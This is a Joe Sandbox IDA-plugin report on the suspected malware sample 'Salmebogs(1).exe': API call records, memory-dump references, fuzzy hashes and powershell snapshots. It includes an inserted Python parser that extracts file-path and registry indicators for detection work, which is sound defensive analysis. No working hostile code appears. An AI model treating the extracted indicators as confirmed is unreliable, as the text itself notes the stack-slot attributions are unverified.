                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID: : Completed
                                                                        • API String ID: 3677997916-2954849223
                                                                        • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                        • Instruction ID: 67c10a838693b4c4a2102f8098a5dbc089b4be67bb217fb13d6fb11fa6bedce4
                                                                        • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                        • Instruction Fuzzy Hash: D6015E3210020AEBCF218F25ED08EDB3BACEF44350F00403AF949D2120D735D964CBA9
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040326A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A5), ref: 004059E7
                                                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040326A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A5), ref: 004059F1
                                                                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405A03
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004059E1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 2659869361-3936084776
                                                                        • Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                                        • Instruction ID: 3776da6525f732e5293341d69cc0e540229ccfe12881bb96e40b78ab3c334061
                                                                        • Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                                        • Instruction Fuzzy Hash: C7D0A771141534AAC221EB469C04CDF639C9F46304341403FF501B30A2C77C5D5187FE
                                                                        APIs
                                                                        • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",00403513,?), ref: 00402D9D
                                                                        • GetTickCount.KERNEL32 ref: 00402DBB
                                                                        • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                        • ShowWindow.USER32(00000000,00000005,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",00403513,?), ref: 00402DE6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                        • String ID:
                                                                        • API String ID: 2102729457-0
                                                                        • Opcode ID: 3ba6df06d1a8a2ebff1cb487cdf72ecd2568b7f3d734aee4a10920d39395f5c6
                                                                        • Instruction ID: ad8085ed609e9a9848802d48f5936c49a501436460537f39ac663ee6903d91f9
                                                                        • Opcode Fuzzy Hash: 3ba6df06d1a8a2ebff1cb487cdf72ecd2568b7f3d734aee4a10920d39395f5c6
                                                                        • Instruction Fuzzy Hash: D2F05831526A21ABC6A16B24FE8CA9B7B64AB84B11711847BF041B11F4DA7C0C92CB9C
                                                                        APIs
                                                                        • SetWindowTextW.USER32(00000000,007A7A20), ref: 00403BE4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: TextWindow
                                                                        • String ID: "C:\Users\user\Desktop\Salmebogs(1).exe"$1033
                                                                        • API String ID: 530164218-3818423526
                                                                        • Opcode ID: 4a9363a6df4f188c469d9e85be5717e9923612549b1d7987802fb003682d7455
                                                                        • Instruction ID: 54645776255075cb8615a9bf9b42270142c769617333b00c78cd875754afbab4
                                                                        • Opcode Fuzzy Hash: 4a9363a6df4f188c469d9e85be5717e9923612549b1d7987802fb003682d7455
                                                                        • Instruction Fuzzy Hash: CA11D171B046019BC7249F15DC50A77376DEBC6719718C13BE802A7392DA3DAD028699
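                                                                        The records above list, per function, the Win32 APIs it calls, the argument slots captured at each call site, and the memory dump that backs the disassembly. The following is an added example, not Joe Sandbox code, that parses this layout into structured records and pulls the file paths and registry keys out of the argument slots so they can be triaged as indicators. SAMPLE is a constructed excerpt copied from three records on this page; the hive constant table (80000002 = HKLM and so on) and the comma-splitting of argument slots are assumptions about the format. One caveat a practitioner should keep in mind: the slots appear to be raw stack contents (return addresses such as 0040616D and duplicated strings show up inside the argument lists), so a value printed under one call may belong to its caller, and anything extracted here should be confirmed against the dump.

```python
"""Parse Joe Sandbox "IDA Plugin" function records (APIs / Strings /
Memory Dump Source / Similarity blocks) and pull file paths and registry
keys out of the captured argument slots.

Added example for this page; it is not Joe Sandbox code.  SAMPLE is a
constructed excerpt copied from three records on the page.  The HIVES
table and the comma-splitting of argument slots are assumptions about
the layout; slots are raw stack contents, so a value may belong to the
caller rather than to the call it is printed under.
"""
import re
from dataclasses import dataclass, field

# Assumed mapping of the HKEY_* root constants seen in the argument slots.
HIVES = {"80000000": "HKCR", "80000001": "HKCU", "80000002": "HKLM",
         "80000003": "HKU", "80000005": "HKCC"}

# "• Api.MODULE(args), ref: 0040XXXX" or "• Api.MODULE ref: 0040XXXX"
API_RE = re.compile(r"^• (\w+)\.(\w+)(?:\((.*)\),)? ref: ([0-9A-Fa-f]{8})$")
PATH_RE = re.compile(r"[A-Za-z]:\\[^,]+")

SAMPLE = r"""
APIs
• WideCharToMultiByte.KERNEL32(?,?,0040B5A8,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\sknserklringerne\antilapse.fel,00000400,?,?,00000021), ref: 00402583
• lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\sknserklringerne\antilapse.fel,?,?,0040B5A8,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\sknserklringerne\antilapse.fel,00000400,?,?,00000021), ref: 0040258E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ByteCharMultiWidelstrlen
• Instruction Fuzzy Hash: 9211E772A01314BEDB10AFB18F4AA9E3265AF94795F20803BF401F61C1DAFC8A41466E
APIs
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,: Completed,?,0040616D,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F24
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,0040616D,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F45
• RegCloseKey.ADVAPI32(?,?,0040616D,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F68
Similarity
• API ID: CloseOpenQueryValue
• Instruction Fuzzy Hash: D6015E3210020AEBCF218F25ED08EDB3BACEF44350F00403AF949D2120D735D964CBA9
APIs
• DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",00403513,?), ref: 00402D9D
• GetTickCount.KERNEL32 ref: 00402DBB
• CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• Instruction Fuzzy Hash: D2F05831526A21ABC6A16B24FE8CA9B7B64AB84B11711847BF041B11F4DA7C0C92CB9C
"""


@dataclass
class ApiCall:
    name: str
    module: str
    args: list          # captured slots, split on ',' (paths with commas would break this)
    ref: str            # call-site address inside the dumped image


@dataclass
class FuncRecord:
    calls: list = field(default_factory=list)
    api_id: str = ""
    fuzzy_hash: str = ""   # Joe Sandbox instruction fuzzy hash, useful for pivoting
    dump: str = ""         # .sdmp file the disassembly was taken from


def parse_records(text):
    """Split the report text on 'APIs' headers and collect each record's fields."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FuncRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            name, mod, args, ref = m.groups()
            slots = [a.strip() for a in args.split(",")] if args else []
            cur.calls.append(ApiCall(name, mod, slots, ref.upper()))
        elif line.startswith("• API ID: "):
            cur.api_id = line[len("• API ID: "):]
        elif line.startswith("• Instruction Fuzzy Hash: "):
            cur.fuzzy_hash = line.split(": ", 1)[1]
        elif line.startswith("• Source File: "):
            cur.dump = line[len("• Source File: "):].split(",", 1)[0]
    return records


def extract_iocs(records):
    """Return (sorted file paths, sorted registry keys) found in any argument slot.
    A registry key is taken as the slot following a known HKEY_* root constant."""
    paths, keys = set(), set()
    for rec in records:
        for call in rec.calls:
            for i, slot in enumerate(call.args):
                if slot in HIVES and i + 1 < len(call.args):
                    keys.add(HIVES[slot] + "\\" + call.args[i + 1])
                for p in PATH_RE.findall(slot):
                    paths.add(p.strip('"'))
    return sorted(paths), sorted(keys)


def calls_touching(records, needle):
    """'Api@ref' for every call whose argument slots mention `needle`."""
    return [f"{c.name}@{c.ref}" for rec in records for c in rec.calls
            if any(needle in a for a in c.args)]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    paths, keys = extract_iocs(recs)
    print("paths:", *paths, sep="\n  ")
    print("keys:", *keys, sep="\n  ")
    print("calls referencing the dropped file:", calls_touching(recs, "antilapse.fel"))
```

Running it over the excerpt yields the dropped file under AppData\Roaming, the submitted sample's own path, the HKLM CurrentVersion key, and the two call sites (00402583, 0040258E) that reference the dropped file, which is exactly the pivot set one would feed into a host search or a YARA string set while treating the stack-slot provenance as unconfirmed.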
                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 0040512F
                                                                        • CallWindowProcW.USER32(?,?,?,?), ref: 00405180
                                                                          • Part of subcall function 0040413D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040414F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                        • String ID:
                                                                        • API String ID: 3748168415-3916222277
                                                                        • Opcode ID: 2db196e0f7310a3ea08cf6f228cdd10093951b38e6a4e1a7139cbd366e119caf
                                                                        • Instruction ID: 5570e87b323d3ab4a73141f23c5ad1f32913b259369346fef97a544c26a8305a
                                                                        • Opcode Fuzzy Hash: 2db196e0f7310a3ea08cf6f228cdd10093951b38e6a4e1a7139cbd366e119caf
                                                                        • Instruction Fuzzy Hash: C4019E31500608AFEB209F11DD80B9B3726EB85355F108036F615792D0C37A8C929E29
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(?,76233420,00000000,C:\Users\user\AppData\Local\Temp\,004037B9,004035CF,?), ref: 004037FB
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00403802
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004037E1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: Free$GlobalLibrary
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 1100898210-3936084776
                                                                        • Opcode ID: 513cb66aec3b184b1656533b532479dca3ec5b33ad4594f499a54eb9bf6dfc70
                                                                        • Instruction ID: 2f8b8ce22cb5ec106cd91628dbf998760d49a3025a1d563264e19f72e628b131
                                                                        • Opcode Fuzzy Hash: 513cb66aec3b184b1656533b532479dca3ec5b33ad4594f499a54eb9bf6dfc70
                                                                        • Instruction Fuzzy Hash: 34E0C2338110309BC6219F54FE04B5ABB686F44F22F19803BF880BB2608BB81C428BD8
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,007B6800,007B6800,80000000,00000003,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",00403513,?), ref: 00405A33
                                                                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,007B6800,007B6800,80000000,00000003,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",00403513,?), ref: 00405A43
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: CharPrevlstrlen
                                                                        • String ID: C:\Users\user\Desktop
                                                                        • API String ID: 2709904686-3125694417
                                                                        • Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                                        • Instruction ID: b6b9263f7e6f7f33dca29af715431404939bf432e253a022a3dbfc1ec44a830d
                                                                        • Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                                        • Instruction Fuzzy Hash: D5D05EB2400920DAC322A704DC40D9F67A8EF52304746842AE840A6161D7785D818AAD
                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E48,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B77
                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B8F
                                                                        • CharNextA.USER32(00000000,?,00000000,00405E48,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BA0
                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405E48,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BA9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 190613189-0
                                                                        • Opcode ID: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                                                                        • Instruction ID: 726002b591c2c836e0c8fef6507a3208c362efe389af0cd528cd0253ba47f693
                                                                        • Opcode Fuzzy Hash: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                                                                        • Instruction Fuzzy Hash: A0F0C235101914EFD7029FA5DD00D9EBBB8EF06350B2140A9E840F7310D674FE019BA8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: _
                                                                        • API String ID: 0-701932520
                                                                        • Opcode ID: 1bf5deb4d2c54a2a2390df0276c33a943dd5e5d62c69ba4bb23680e58f53e163
                                                                        • Instruction ID: 0d9f15c6d6a1d2d3f9da99ed22fbdfd8d50da0f7ee8b1c1e5f0c79e82baa9955
                                                                        • Opcode Fuzzy Hash: 1bf5deb4d2c54a2a2390df0276c33a943dd5e5d62c69ba4bb23680e58f53e163
                                                                        • Instruction Fuzzy Hash: D9B2B0B0B00215CFDB15CB68C854BFABBB6AF85325F14C4AAD5099B351DB32DD82CB91
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: =
                                                                        • API String ID: 0-2322244508
                                                                        • Opcode ID: bbbdada7531e9d0012671c3e36e83b025443a24fd452294813050031dcf629fa
                                                                        • Instruction ID: 0f83f95500b5b789db3ff466228feae32d03c16ab9bf637e59cc577b27d263e3
                                                                        • Opcode Fuzzy Hash: bbbdada7531e9d0012671c3e36e83b025443a24fd452294813050031dcf629fa
                                                                        • Instruction Fuzzy Hash: AE1259B1B04656CFD7158B7898107EBBBAEBFC5222F1480BBD505CB751DAB1C842C7A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3455795886.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7350000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: abc96e0b35865142a14d673e173f2a02f9c30d02ac4a224bb11ed47662b9eb45
                                                                        • Instruction ID: 5a9cbca98c0514a094b1b3977b15f213f65b337e8d4a2fe735afd63338afa239
                                                                        • Opcode Fuzzy Hash: abc96e0b35865142a14d673e173f2a02f9c30d02ac4a224bb11ed47662b9eb45
                                                                        • Instruction Fuzzy Hash: 4682D4F1B00219DFEB18CF68C850B6BBBA2BFC5310F14856AED098B651DB31D951CBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b5c04013bc53541129829452c213f2dad450f2036b4bf5e6cdf87d1584b5b862
                                                                        • Instruction ID: 167e2ee61d6f6a88b59acfb3f999b81bb3ae0f197453eaae45aea1a7c2f28176
                                                                        • Opcode Fuzzy Hash: b5c04013bc53541129829452c213f2dad450f2036b4bf5e6cdf87d1584b5b862
                                                                        • Instruction Fuzzy Hash: 2D82A4B0B00215DFDB14DB58C840BAABBB6AFC5315F15C0AAD5499F351DB72EC82CB92
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
